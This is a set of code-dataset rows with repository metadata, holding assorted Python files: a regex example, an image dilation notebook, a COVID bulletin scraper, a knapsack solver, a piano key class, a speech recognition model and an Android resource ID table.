c1ee6f4947657113b61bda3ebddde056c335a43e | 177 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_RegEx_mutch_object_2.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_RegEx_mutch_object_2.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_RegEx_mutch_object_2.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | import re
# Search for an upper case "S" character in the beginning of a word, and print its position:
txt = "The rain in Spain"
x = re.search(r"\bS\w+", txt)
print(x.span())
| 22.125 | 92 | 0.683616 | import re
# Search for an upper case "S" character in the beginning of a word, and print its position:
txt = "The rain in Spain"
x = re.search(r"\bS\w+", txt)
print(x.span())
| 0 | 0 | 0 |
574d913190a685e09ec510612cf6538d5b689ad0 | 2,203 | py | Python | Dilation.py | gmagannaDevelop/MorphoImg | 751985a430f3ab9f8ded7a18fdeb2eb41cb112e5 | [
"MIT"
] | 1 | 2019-11-18T14:54:11.000Z | 2019-11-18T14:54:11.000Z | Dilation.py | gmagannaDevelop/MorphoImg | 751985a430f3ab9f8ded7a18fdeb2eb41cb112e5 | [
"MIT"
] | 7 | 2020-03-24T17:49:09.000Z | 2022-01-13T01:51:33.000Z | Dilation.py | gmagannaDevelop/MorphoImg | 751985a430f3ab9f8ded7a18fdeb2eb41cb112e5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[31]:
from typing import Optional, Callable, Tuple, List, NoReturn
from functools import partial, reduce
import matplotlib.pyplot as plt
import matplotlib.image as img
import numpy as np
import cv2 as cv
import PIL as pil
# In[2]:
# User-defined functions, utils module found in the same directory as Erosion.ipynb
from utils import binarise, side_by_side
# In[3]:
x = img.imread('imagenes/Im1T4.png')
# In[4]:
plt.imshow(x, cmap='gray')
# In[5]:
x = 1 - x
# In[6]:
plt.imshow(x, cmap='gray')
# In[7]:
binaria = binarise(x)
plt.imshow(binaria, cmap='gray')
# In[8]:
help(cv.dilate)
# In[9]:
kernel = np.ones((10, 10))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[10]:
kernel = np.ones((2, 50))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[11]:
kernel = np.ones((50, 2))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# # Example found on page 643
# In[12]:
text = cv.imread('imagenes/text.png', 0)
text.shape
# In[13]:
plt.imshow(text, cmap='gray')
# In[14]:
text2 = binarise(text, threshold=115)
plt.imshow(text2, cmap='gray')
# In[15]:
kernel = np.ones((1, 1))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[16]:
kernel = np.ones((3, 3))
side_by_side(text2[400:, 400:], cv.dilate(text2[400:, 400:], kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[17]:
kernel = np.ones((15, 15))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[ ]:
# In[43]:
A = np.zeros((11, 11))
A[5, 5] = 1
plt.grid()
plt.imshow(A, cmap='gray')
# In[42]:
B = [A, np.ones((3, 1)), np.ones((1, 3))]
dilate_decomposed = reduce(lambda x, y: cv.dilate(x, y), B)
plt.grid()
plt.imshow(dilate_decomposed, cmap='gray')
# In[49]:
y = np.array([1, 1, 0, 0, 1, 1, 0, 1, 0])
y.shape = 3, 3
y = np.uint8(y)
y
# In[52]:
side_by_side(A, cv.dilate(A, y))
# In[40]:
np.ones((3, 1))
# In[ ]:
reverse
| 12.517045 | 121 | 0.639128 | #!/usr/bin/env python
# coding: utf-8
# In[31]:
from typing import Optional, Callable, Tuple, List, NoReturn
from functools import partial, reduce
import matplotlib.pyplot as plt
import matplotlib.image as img
import numpy as np
import cv2 as cv
import PIL as pil
# In[2]:
# User-defined functions, utils module found in the same directory as Erosion.ipynb
from utils import binarise, side_by_side
# In[3]:
x = img.imread('imagenes/Im1T4.png')
# In[4]:
plt.imshow(x, cmap='gray')
# In[5]:
x = 1 - x
# In[6]:
plt.imshow(x, cmap='gray')
# In[7]:
binaria = binarise(x)
plt.imshow(binaria, cmap='gray')
# In[8]:
help(cv.dilate)
# In[9]:
kernel = np.ones((10, 10))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[10]:
kernel = np.ones((2, 50))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[11]:
kernel = np.ones((50, 2))
side_by_side(binaria, cv.dilate(binaria, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# # Example found on page 643
# In[12]:
text = cv.imread('imagenes/text.png', 0)
text.shape
# In[13]:
plt.imshow(text, cmap='gray')
# In[14]:
text2 = binarise(text, threshold=115)
plt.imshow(text2, cmap='gray')
# In[15]:
kernel = np.ones((1, 1))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[16]:
kernel = np.ones((3, 3))
side_by_side(text2[400:, 400:], cv.dilate(text2[400:, 400:], kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[17]:
kernel = np.ones((15, 15))
side_by_side(text2, cv.dilate(text2, kernel), title1='Original', title2=f'Kernel {kernel.shape}')
# In[ ]:
# In[43]:
A = np.zeros((11, 11))
A[5, 5] = 1
plt.grid()
plt.imshow(A, cmap='gray')
# In[42]:
B = [A, np.ones((3, 1)), np.ones((1, 3))]
dilate_decomposed = reduce(lambda x, y: cv.dilate(x, y), B)
plt.grid()
plt.imshow(dilate_decomposed, cmap='gray')
# In[49]:
y = np.array([1, 1, 0, 0, 1, 1, 0, 1, 0])
y.shape = 3, 3
y = np.uint8(y)
y
# In[52]:
side_by_side(A, cv.dilate(A, y))
# In[40]:
np.ones((3, 1))
# In[ ]:
reverse
| 0 | 0 | 0 |
5059b78da4509944d16af0cb21a27524244a0d2b | 1,621 | py | Python | data_extractor/bulletin_download/states/MP.py | IBM/covid19-india-data | e2be04e74e753fbd1b1580f62856bf7335b95d33 | [
"MIT"
] | 20 | 2021-08-15T19:00:57.000Z | 2022-03-28T21:23:28.000Z | data_extractor/bulletin_download/states/MP.py | IBM/covid19-india-data | e2be04e74e753fbd1b1580f62856bf7335b95d33 | [
"MIT"
] | 78 | 2021-08-17T22:34:39.000Z | 2022-01-06T02:49:30.000Z | data_extractor/bulletin_download/states/MP.py | IBM/covid19-india-data | e2be04e74e753fbd1b1580f62856bf7335b95d33 | [
"MIT"
] | 8 | 2021-08-30T19:35:27.000Z | 2022-02-08T14:07:10.000Z | from .bulletin import Bulletin
from bs4 import BeautifulSoup
import re
| 26.145161 | 116 | 0.555213 | from .bulletin import Bulletin
from bs4 import BeautifulSoup
import re
class MadhyaPradesh(Bulletin):
def __init__(self, basedir):
statename = 'MP'
super().__init__(basedir, statename)
def get_bulletin_links(self):
burl = "http://sarthak.nhmmp.gov.in/covid/health-bulletin"
html = self.get_url_html(burl)
soup = BeautifulSoup(html, 'html.parser')
bulletin_links = dict()
for anchor in soup.find_all('a'):
anchor_href = anchor.get('href')
if anchor_href:
match = re.search(r'(\d+.\d+.202\d+)', anchor_href)
if match:
date_time_str = match.group(1)
date_time_str = date_time_str.replace("_", ".")
date_time_str = date_time_str.replace("202020", "2020")
if len(date_time_str) == 8:
date_time_str = "{}.{}.{}".format(date_time_str[0:2], date_time_str[2:4], date_time_str[4:])
try:
datestr = self.get_date_str(date_time_str, datefmts=['%d.%m.%Y'])
if datestr in bulletin_links or "hindi" in anchor_href.lower():
continue
bulletin_links[datestr] = anchor_href
except: pass
return bulletin_links
def run(self):
print(f'\t Downloading Madhya Pradesh bulletins')
bulletin_links = self.get_bulletin_links()
self.download_bulletins(bulletin_links)
self._save_state_()
return bulletin_links
| 1,434 | 9 | 104 |
3ece990d3b54f8ff05c83892af36a81d65bbf73f | 11,159 | py | Python | python3/knapsack/greedyNdKnapsack.py | CostaBru/knapsack | cdd95de759c20b0cdeef4064fbbed10df1ab76d0 | [
"MIT"
] | 1 | 2021-03-06T16:38:28.000Z | 2021-03-06T16:38:28.000Z | python3/knapsack/greedyNdKnapsack.py | CostaBru/knapsack | cdd95de759c20b0cdeef4064fbbed10df1ab76d0 | [
"MIT"
] | null | null | null | python3/knapsack/greedyNdKnapsack.py | CostaBru/knapsack | cdd95de759c20b0cdeef4064fbbed10df1ab76d0 | [
"MIT"
] | null | null | null | """
Copyright Jun 2021 Konstantin Briukhnov (kooltew at gmail.com) (@CostaBru). San-Francisco Bay Area.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from flags.flags import doUseLimits, doSolveSuperInc
from .knapsack import knapsackSolver
from .knapsackNd import knapsackNSolver
from .knapsackPareto import *
from collections import defaultdict
from collections import deque
from decimal import Decimal
import time
import math
import sys
from .paretoPoint import paretoPoint, paretoPoint1
from .wPoint import wPoint1
| 42.919231 | 268 | 0.605879 | """
Copyright Jun 2021 Konstantin Briukhnov (kooltew at gmail.com) (@CostaBru). San-Francisco Bay Area.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from flags.flags import doUseLimits, doSolveSuperInc
from .knapsack import knapsackSolver
from .knapsackNd import knapsackNSolver
from .knapsackPareto import *
from collections import defaultdict
from collections import deque
from decimal import Decimal
import time
import math
import sys
from .paretoPoint import paretoPoint, paretoPoint1
from .wPoint import wPoint1
class greedyKnapsackNdSolver:
def __init__(self, constraints, items, values, iterCounter, emptyPoint, forceUseLimits=False, forceUseDpSolver=False):
self.constraints = constraints
self.items = items
self.values = values
self.iterCounter = iterCounter
self.forceUseLimits = forceUseLimits
self.emptyPoint = emptyPoint
self.size = constraints.getSize()
self.useParetoGreedy = False
self.totalPointCount = 0
self.printDpInfo = False
self.printGreedyInfo = False
self.printSuperIncreasingInfo = False
self.doSolveSuperInc = True
self.canBackTraceWhenSizeReached = False
self.useRatioSortForPareto = False
def createNewPoint(self, tuples):
return self.emptyPoint.createNew(tuples)
def sortBoth(self, w, v, reverse=True):
sorted_pairs = sorted(zip(w, v), reverse=reverse, key=lambda t: (t[0], t[1]))
tuples = zip(*sorted_pairs)
return [list(tuple) for tuple in tuples]
def sortReverse3Both(self, w, v, x):
sorted_pairs = sorted(zip(w, v, x), reverse=True, key=lambda t: (t[0], t[1]))
tuples = zip(*sorted_pairs)
return [list(tuple) for tuple in tuples]
def solveByPareto(self, constraints, lessSizeItems, lessSizeValues, iterCounter):
if self.printGreedyInfo:
print(f"{constraints.getSize()}D knapsack NON exact pareto solver: N {len(lessSizeItems)}")
paretoSolver = knapsackParetoSolver(lessSizeItems, lessSizeValues, range(len(lessSizeValues)), constraints,
paretoPoint(self.emptyPoint.getDimensions(), 0), self.emptyPoint, iterCounter)
paretoSolver.printInfo = self.printDpInfo
paretoSolver.canBackTraceWhenSizeReached = self.canBackTraceWhenSizeReached
paretoSolver.useRatioSort = self.useRatioSortForPareto
opt, optDims, optItems, optValues, optIndex = paretoSolver.solve()
return opt, optDims, optItems, optValues
def solveKnapsackNd(self, constraints, descNewDims, descNewVals, doSolveSuperInc, forceUseLimits, iterCounter):
limitSolver = knapsackNSolver(constraints, descNewDims, descNewVals, iterCounter, self.emptyPoint, forceUseLimits=True, forceUseDpSolver=True)
return limitSolver.solve()
def solve(self):
size = self.constraints.getSize()
maxN = -sys.maxsize
maxDimN = self.emptyPoint
maxNItems = []
maxNValues = []
dimDescSortedItems = [None] * size
dimStairSteps = [None] * size
optimizeCacheItems = [None] * size
solvers = [None] * size
dimStairDownCursors = [0] * size
dimStairDownCursorStartings = [0] * size
estimatedAttemptsCount = 0
_, dimensionIndexes = self.sortBoth(self.constraints.getDimensions(), range(size), reverse=False)
for dimensionIndex in range(size):
dimOrderIndex = dimensionIndexes[dimensionIndex]
descDim = [p.getDimension(dimOrderIndex) for p in self.items]
descValues = self.values
descIndex = list(range(len(self.values)))
self.iterCounter[0] += (len(descDim) * math.log2(len(descDim)))
dimDescSortedItems[dimensionIndex] = (descDim, descValues, descIndex)
dimStairSteps[dimensionIndex] = descDim[-1]
dimStairDownCursors[dimensionIndex] = self.constraints.getDimension(dimOrderIndex)
dimStairDownCursorStartings[dimensionIndex] = self.constraints.getDimension(dimOrderIndex)
optimizeCacheItems[dimensionIndex] = {}
estimatedAttemptsCount += dimStairDownCursors[dimensionIndex] // dimStairSteps[dimensionIndex]
solver = knapsackParetoSolver([wPoint1(item) for item in descDim],
descValues,
range(len(descValues)),
wPoint1(self.constraints.getDimension(dimOrderIndex)),
paretoPoint1(0, 0),
wPoint1(0),
self.iterCounter)
solver.forceUsePareto = True
solver.prepareSearchIndex = True
solvers[dimensionIndex] = solver
if self.printGreedyInfo:
print(f"The NON exact {size}D greedyTopDown knapsack solver called for N = {len(self.items)}. Estimated attempts: {estimatedAttemptsCount}.")
self.iterCounter[0] += size
t0 = time.perf_counter()
optimizeIterIndex = 0
anyGreaterThanStep = True
prevOptimizedIndexes = set()
while anyGreaterThanStep:
t1 = time.perf_counter()
optimizedIndexes = set()
for dimensionIndex in range(size):
currentDimLimit = dimStairDownCursors[dimensionIndex]
if currentDimLimit not in optimizeCacheItems[dimensionIndex]:
_, __, ___, ____, optIndex = solvers[dimensionIndex].solve(wPoint1(currentDimLimit))
dimIndex = dimDescSortedItems[dimensionIndex][2]
dimCacheItems = []
for oi in optIndex:
itemIndex = dimIndex[oi]
dimCacheItems.append(itemIndex)
optimizedIndexes.add(itemIndex)
self.iterCounter[0] += len(optIndex)
optimizeCacheItems[dimensionIndex][currentDimLimit] = dimCacheItems
else:
optimizedIndexes.update(optimizeCacheItems[dimensionIndex][currentDimLimit])
self.iterCounter[0] += len(optimizeCacheItems[dimensionIndex])
newData = []
newValues = []
optTuple = tuple(optimizedIndexes)
if optTuple not in prevOptimizedIndexes:
sumOfNewValues = 0
for itemIndex in optimizedIndexes:
nDims = [0] * size
for dimensionIndex in range(size):
dimIndex = dimensionIndexes[dimensionIndex]
nDims[dimIndex] = self.items[itemIndex].getDimension(dimIndex)
newData.append(self.createNewPoint(nDims))
newValues.append(self.values[itemIndex])
sumOfNewValues += self.values[itemIndex]
self.iterCounter[0] += len(optimizedIndexes) * size
if sumOfNewValues > maxN:
descNewDims, descNewVals = self.sortBoth(newData, newValues)
self.iterCounter[0] += (len(descNewDims) * math.log2(len(descNewDims)))
optN, optDimN, optItemsN, optValuesN = self.solveKnapsackNd(self.constraints,
descNewDims,
descNewVals,
doSolveSuperInc,
self.forceUseLimits,
self.iterCounter)
attemptTimeS = round(time.perf_counter() - t1, 4)
if maxN < optN:
maxN = optN
maxDimN = optDimN
maxNValues = optValuesN
maxNItems = optItemsN
if self.printGreedyInfo and optimizeIterIndex == 0:
estimatedMaxTime = estimatedAttemptsCount * Decimal(attemptTimeS)
print(
f"The NON exact {size}D greedyTopDown knapsack solver: estimated max time {estimatedMaxTime}.")
if self.printGreedyInfo:
print(
f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex}, some max value {maxN} has been found, time {attemptTimeS}, total time {round(time.perf_counter() - t0, 4)}, total iters {round(self.iterCounter[0])}.")
elif self.printGreedyInfo and attemptTimeS > 2:
print(
f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex}, delta max {maxN - optN}, time {attemptTimeS}, total time {round(time.perf_counter() - t0, 4)}, total iters {round(self.iterCounter[0])}")
prevOptimizedIndexes.add(optTuple)
elif self.printGreedyInfo:
print(
f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex} was skipped due to less values. Exiting.")
break
elif self.printGreedyInfo:
print(f"The NON exact {size}D greedyTopDown knapsack solver: attempt {optimizeIterIndex} was skipped.")
decIndex = (optimizeIterIndex) % size
if dimStairDownCursors[decIndex] >= dimStairSteps[decIndex]:
dimStairDownCursors[decIndex] -= dimStairSteps[decIndex]
for dimensionIndex in range(size):
anyGreaterThanStep = dimStairDownCursors[dimensionIndex] >= dimStairSteps[dimensionIndex]
if anyGreaterThanStep:
break
optimizeIterIndex += 1
return maxN, maxDimN, maxNItems, maxNValues | 9,433 | 8 | 212 |
ed13bd0aa077e3581aab8400854ef77def5fdd81 | 1,297 | py | Python | src/piano/key.py | maylahn/piano-visualizer | d49b548ff5a18f5b6dcfeaaba71464cf3106062a | [
"MIT"
] | null | null | null | src/piano/key.py | maylahn/piano-visualizer | d49b548ff5a18f5b6dcfeaaba71464cf3106062a | [
"MIT"
] | null | null | null | src/piano/key.py | maylahn/piano-visualizer | d49b548ff5a18f5b6dcfeaaba71464cf3106062a | [
"MIT"
] | null | null | null | from mido import Message
from settings import MIDI_MSG_NOTE_OFFSET
from utility.state import KeyState
| 27.595745 | 63 | 0.583655 | from mido import Message
from settings import MIDI_MSG_NOTE_OFFSET
from utility.state import KeyState
class Key:
def __init__(self, index, note):
self.index = index
self.midi_index = index + MIDI_MSG_NOTE_OFFSET
self.note = note
self.led_index = self.get_led_index()
self.frequency = self.get_frequency()
self.state = KeyState.Released
self.velocity = 0
self.led = None
def get_frequency(self):
return 440 * 2 ** ((self.index - 48) / 12)
def get_led_index(self):
if self.index < 36:
return self.index * 2 + 1
elif self.index > 71:
return self.index * 2 - 1
else:
return self.index * 2
def set_pressed(self, velocity=100):
self.state = KeyState.Pressed
self.velocity = velocity
def set_released(self, velocity=0):
self.state = KeyState.Released
self.velocity = velocity
def to_midi_message(self, type):
return Message(
"note_{}".format(type),
note=self.midi_index,
velocity=127 if type == "on" else 0,
)
def __str__(self):
return "Note: {} KeyState: {} Velocity: {}".format(
self.note, self.state, self.velocity
)
| 994 | -11 | 211 |
9b8ecd42d65fa34b19512883a8983cf4b50cb5cb | 6,962 | py | Python | S13/deployment/ETESR/model.py | pankaj90382/TSAI-2 | af4b3543dfb206fb1cc2bd166ed31e9ea7bd3778 | [
"MIT"
] | null | null | null | S13/deployment/ETESR/model.py | pankaj90382/TSAI-2 | af4b3543dfb206fb1cc2bd166ed31e9ea7bd3778 | [
"MIT"
] | 9 | 2021-06-08T22:18:08.000Z | 2022-03-12T00:46:43.000Z | S13/deployment/ETESR/model.py | pankaj90382/TSAI-2 | af4b3543dfb206fb1cc2bd166ed31e9ea7bd3778 | [
"MIT"
] | 1 | 2020-10-12T17:13:35.000Z | 2020-10-12T17:13:35.000Z | import torch
import torch.nn as nn
import torch.utils.data as data
import torch.optim as optim
import torch.nn.functional as F
import torchaudio
class TextTransform:
"""Maps characters to integers and vice versa"""
def text_to_int(self, text):
""" Use a character map and convert text to an integer sequence """
int_sequence = []
for c in text:
if c == ' ':
ch = self.char_map['<SPACE>']
else:
ch = self.char_map[c]
int_sequence.append(ch)
return int_sequence
def int_to_text(self, labels):
""" Use a character map and convert integer labels to an text sequence """
string = []
for i in labels:
string.append(self.index_map[i])
return ''.join(string).replace('<SPACE>', ' ')
text_transform = TextTransform()
class CNNLayerNorm(nn.Module):
"""Layer normalization built for cnns input"""
class ResidualCNN(nn.Module):
"""Residual CNN inspired by https://arxiv.org/pdf/1603.05027.pdf
except with layer norm instead of batch norm
"""
| 33.471154 | 125 | 0.586326 | import torch
import torch.nn as nn
import torch.utils.data as data
import torch.optim as optim
import torch.nn.functional as F
import torchaudio
class TextTransform:
"""Maps characters to integers and vice versa"""
def __init__(self):
char_map_str = """
' 0
<SPACE> 1
a 2
b 3
c 4
d 5
e 6
f 7
g 8
h 9
i 10
j 11
k 12
l 13
m 14
n 15
o 16
p 17
q 18
r 19
s 20
t 21
u 22
v 23
w 24
x 25
y 26
z 27
"""
self.char_map = {}
self.index_map = {}
for line in char_map_str.strip().split('\n'):
ch, index = line.split()
self.char_map[ch] = int(index)
self.index_map[int(index)] = ch
self.index_map[1] = ' '
def text_to_int(self, text):
""" Use a character map and convert text to an integer sequence """
int_sequence = []
for c in text:
if c == ' ':
ch = self.char_map['<SPACE>']
else:
ch = self.char_map[c]
int_sequence.append(ch)
return int_sequence
def int_to_text(self, labels):
""" Use a character map and convert integer labels to an text sequence """
string = []
for i in labels:
string.append(self.index_map[i])
return ''.join(string).replace('<SPACE>', ' ')
text_transform = TextTransform()
def GreedyDecoder(output, blank_label=28, collapse_repeated=True):
arg_maxes = torch.argmax(output, dim=2)
decodes = []
#targets = []
for i, args in enumerate(arg_maxes):
decode = []
#targets.append(text_transform.int_to_text(labels[i][:label_lengths[i]].tolist()))
for j, index in enumerate(args):
if index != blank_label:
if collapse_repeated and j != 0 and index == args[j -1]:
continue
decode.append(index.item())
decodes.append(text_transform.int_to_text(decode))
return decodes
class CNNLayerNorm(nn.Module):
"""Layer normalization built for cnns input"""
def __init__(self, n_feats):
super(CNNLayerNorm, self).__init__()
self.layer_norm = nn.LayerNorm(n_feats)
def forward(self, x):
# x (batch, channel, feature, time)
x = x.transpose(2, 3).contiguous() # (batch, channel, time, feature)
x = self.layer_norm(x)
return x.transpose(2, 3).contiguous() # (batch, channel, feature, time)
class ResidualCNN(nn.Module):
"""Residual CNN inspired by https://arxiv.org/pdf/1603.05027.pdf
except with layer norm instead of batch norm
"""
def __init__(self, in_channels, out_channels, kernel, stride, dropout, n_feats):
super(ResidualCNN, self).__init__()
self.cnn1 = nn.Conv2d(in_channels, out_channels, kernel, stride, padding=kernel//2)
self.cnn2 = nn.Conv2d(out_channels, out_channels, kernel, stride, padding=kernel//2)
self.dropout1 = nn.Dropout(dropout)
self.dropout2 = nn.Dropout(dropout)
self.layer_norm1 = CNNLayerNorm(n_feats)
self.layer_norm2 = CNNLayerNorm(n_feats)
def forward(self, x):
residual = x # (batch, channel, feature, time)
x = self.layer_norm1(x)
x = F.gelu(x)
x = self.dropout1(x)
x = self.cnn1(x)
x = self.layer_norm2(x)
x = F.gelu(x)
x = self.dropout2(x)
x = self.cnn2(x)
x += residual
return x # (batch, channel, feature, time)
class BidirectionalGRU(nn.Module):
def __init__(self, rnn_dim, hidden_size, dropout, batch_first):
super(BidirectionalGRU, self).__init__()
self.BiGRU = nn.GRU(
input_size=rnn_dim, hidden_size=hidden_size,
num_layers=1, batch_first=batch_first, bidirectional=True)
self.layer_norm = nn.LayerNorm(rnn_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
x = self.layer_norm(x)
x = F.gelu(x)
x, _ = self.BiGRU(x)
x = self.dropout(x)
return x
class SpeechRecognitionModel(nn.Module):
def __init__(self, n_cnn_layers, n_rnn_layers, rnn_dim, n_class, n_feats, stride=2, dropout=0.1):
super(SpeechRecognitionModel, self).__init__()
n_feats = n_feats//2
self.cnn = nn.Conv2d(1, 32, 3, stride=stride, padding=3//2) # cnn for extracting heirachal features
# n residual cnn layers with filter size of 32
self.rescnn_layers = nn.Sequential(*[
ResidualCNN(32, 32, kernel=3, stride=1, dropout=dropout, n_feats=n_feats)
for _ in range(n_cnn_layers)
])
self.fully_connected = nn.Linear(n_feats*32, rnn_dim)
self.birnn_layers = nn.Sequential(*[
BidirectionalGRU(rnn_dim=rnn_dim if i==0 else rnn_dim*2,
hidden_size=rnn_dim, dropout=dropout, batch_first=i==0)
for i in range(n_rnn_layers)
])
self.classifier = nn.Sequential(
nn.Linear(rnn_dim*2, rnn_dim), # birnn returns rnn_dim*2
nn.GELU(),
nn.Dropout(dropout),
nn.Linear(rnn_dim, n_class)
)
def forward(self, x):
x = self.cnn(x)
x = self.rescnn_layers(x)
sizes = x.size()
x = x.view(sizes[0], sizes[1] * sizes[2], sizes[3]) # (batch, feature, time)
x = x.transpose(1, 2) # (batch, time, feature)
x = self.fully_connected(x)
x = self.birnn_layers(x)
x = self.classifier(x)
return x
def load_audio(audio):
waveform,_ = torchaudio.load(audio)
valid_audio_transforms = torchaudio.transforms.MelSpectrogram()
spec = valid_audio_transforms(waveform).squeeze(0).transpose(0, 1)
spectrograms = nn.utils.rnn.pad_sequence(spec.view(1,*spec.shape), batch_first=True).unsqueeze(1).transpose(2, 3)
return spectrograms
def load_model(model):
net = torch.load(model)
return net
def srtotext(audio, model):
hparams = {"n_cnn_layers": 3, "n_rnn_layers": 5, "rnn_dim": 512, "n_class": 29, "n_feats": 128, "stride":2, "dropout": 0.1}
print('Loading mfcc')
mfcc = load_audio(audio)
print('Load Model')
net = SpeechRecognitionModel(
hparams['n_cnn_layers'], hparams['n_rnn_layers'], hparams['rnn_dim'],
hparams['n_class'], hparams['n_feats'], hparams['stride'], hparams['dropout'])
print('Already Initiate a class')
net.load_state_dict(torch.load(model))
net.eval()
with torch.no_grad():
output = net(mfcc)
output = F.log_softmax(output, dim=2)
output = output.transpose(0, 1) # (time, batch, n_class)
decoded_preds = GreedyDecoder(output.transpose(0, 1))
return decoded_preds | 5,359 | 32 | 415 |
2965a0c80b2671a72e657104596c8c9acf7af8ce | 87,018 | py | Python | androguard/core/resources/public.py | tantran1999/Android-Malware-Detection | e89e4752cd4ded2d71c27af34d4b36946dbd6e0f | [
"MIT"
] | 2 | 2020-12-01T19:13:23.000Z | 2021-03-17T08:54:10.000Z | androguard/core/resources/public.py | tantran1999/Android-Malware-Detection | e89e4752cd4ded2d71c27af34d4b36946dbd6e0f | [
"MIT"
] | null | null | null | androguard/core/resources/public.py | tantran1999/Android-Malware-Detection | e89e4752cd4ded2d71c27af34d4b36946dbd6e0f | [
"MIT"
] | null | null | null | resources = {
'style': {
'Animation' : 16973824,
'Animation.Activity' : 16973825,
'Animation.Dialog' : 16973826,
'Animation.InputMethod' : 16973910,
'Animation.Toast' : 16973828,
'Animation.Translucent' : 16973827,
'DeviceDefault.ButtonBar' : 16974287,
'DeviceDefault.ButtonBar.AlertDialog' : 16974288,
'DeviceDefault.Light.ButtonBar' : 16974290,
'DeviceDefault.Light.ButtonBar.AlertDialog' : 16974291,
'DeviceDefault.Light.SegmentedButton' : 16974292,
'DeviceDefault.SegmentedButton' : 16974289,
'Holo.ButtonBar' : 16974053,
'Holo.ButtonBar.AlertDialog' : 16974055,
'Holo.Light.ButtonBar' : 16974054,
'Holo.Light.ButtonBar.AlertDialog' : 16974056,
'Holo.Light.SegmentedButton' : 16974058,
'Holo.SegmentedButton' : 16974057,
'MediaButton' : 16973879,
'MediaButton.Ffwd' : 16973883,
'MediaButton.Next' : 16973881,
'MediaButton.Pause' : 16973885,
'MediaButton.Play' : 16973882,
'MediaButton.Previous' : 16973880,
'MediaButton.Rew' : 16973884,
'TextAppearance' : 16973886,
'TextAppearance.DeviceDefault' : 16974253,
'TextAppearance.DeviceDefault.DialogWindowTitle' : 16974264,
'TextAppearance.DeviceDefault.Inverse' : 16974254,
'TextAppearance.DeviceDefault.Large' : 16974255,
'TextAppearance.DeviceDefault.Large.Inverse' : 16974256,
'TextAppearance.DeviceDefault.Medium' : 16974257,
'TextAppearance.DeviceDefault.Medium.Inverse' : 16974258,
'TextAppearance.DeviceDefault.SearchResult.Subtitle' : 16974262,
'TextAppearance.DeviceDefault.SearchResult.Title' : 16974261,
'TextAppearance.DeviceDefault.Small' : 16974259,
'TextAppearance.DeviceDefault.Small.Inverse' : 16974260,
'TextAppearance.DeviceDefault.Widget' : 16974265,
'TextAppearance.DeviceDefault.Widget.ActionBar.Menu' : 16974286,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle' : 16974279,
'TextAppearance.DeviceDefault.Widget.ActionBar.Subtitle.Inverse' : 16974283,
'TextAppearance.DeviceDefault.Widget.ActionBar.Title' : 16974278,
